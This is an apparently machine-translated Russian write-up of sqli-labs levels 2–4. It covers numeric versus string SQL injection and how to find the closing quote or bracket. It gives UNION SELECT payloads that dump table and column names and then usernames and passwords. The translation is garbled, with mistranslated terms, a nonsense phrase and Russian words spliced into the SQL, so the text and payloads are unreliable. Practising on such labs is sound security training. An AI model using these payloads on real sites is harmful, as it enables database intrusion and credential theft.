Предисловие: в этой части в основном записываются записи 2-4 sqli-labs, из которых, я думаю, наиболее важным является то, как судить о закрытом символе.
sqli-labs вводит от двух до четырех уровней
Второй уровень
Сначала оцените, является ли это инъекцией пластика или инъекцией символов.Из
рисунка выше видно, что это числовая инъекция, то есть закрытые символы не требуются.
Анализируя количество столбцов,
можно увидеть, что количество столбцов 3
определяет,
нарушила ли позиция отображения базу данных
из полученного имени таблицы базы данных
? Id = -1 union select 1,
(select group_concat (table_name) from information_schema.tables, где table_schema = 'security '), 3- + (Чистый удар рукой)
получить имя столбца из имени таблицы
? Id = -1 union select 1, (select group_concat (column_name) from information_schema.columns, где table_schema =' security 'и table_name =' users ' ), 3– +
Get, столбец Информация о
носителе? Id = -1 union select 1, (select concat_ws (char (32,58,32), username, password) from users limit 1,1), 3 - +
Третий проход
Сначала определите,
какой тип инъекции.
Известно, что это инъекция символьного типа, то есть необходимо определить закрытый символ.
Сначала определите 'и ", то есть, если
сообщается
об ошибке , этот символ вводится - + символ комментария, если об ошибке не сообщается, закрытый символ является этим символом, если сообщается об ошибке, затем добавьте еще одну скобку.
После вынесения решения третий закрывающий символ будет '), а остальные шаги такие же, как первый проход.
Четвертый уровень
Считается, что это инъекция символьного типа. Считается,
что закрытый символ - это "), и следующие шаги аналогичны первому проходу.